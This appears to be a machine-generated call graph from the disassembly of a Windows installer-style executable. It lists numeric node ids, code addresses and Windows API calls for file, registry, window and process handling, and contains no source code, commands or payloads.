4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3500 403d6b 3435->3500 3445 4055f4 3436->3445 3506 403ddb 3436->3506 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3443 405634 KiUserCallbackDispatcher 3503 40141d 3443->3503 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3476 403d6b 19 API calls 3469->3476 3491 40584a DestroyWindow 3469->3491 3473 40141d 80 API calls 3470->3473 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3473->3475 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3476->3477 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3509 403db1 KiUserCallbackDispatcher 3479->3509 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3510 403dc4 SendMessageW 3484->3510 3511 406035 lstrcpynW 3484->3511 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3512 40139d 3489->3512 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 406831 18 API calls 3500->3501 3502 403d76 SetDlgItemTextW 3501->3502 3502->3443 3504 40139d 80 API calls 3503->3504 3505 401432 3504->3505 3505->3434 3507 403df3 3506->3507 3508 403de4 SendMessageW 3506->3508 3507->3469 3508->3507 3509->3481 3510->3484 3511->3487 3515 4013a4 3512->3515 3513 401410 3513->3469 3515->3513 3516 4013dd MulDiv SendMessageW 3515->3516 3534 4015a0 3515->3534 3516->3515 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3515 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 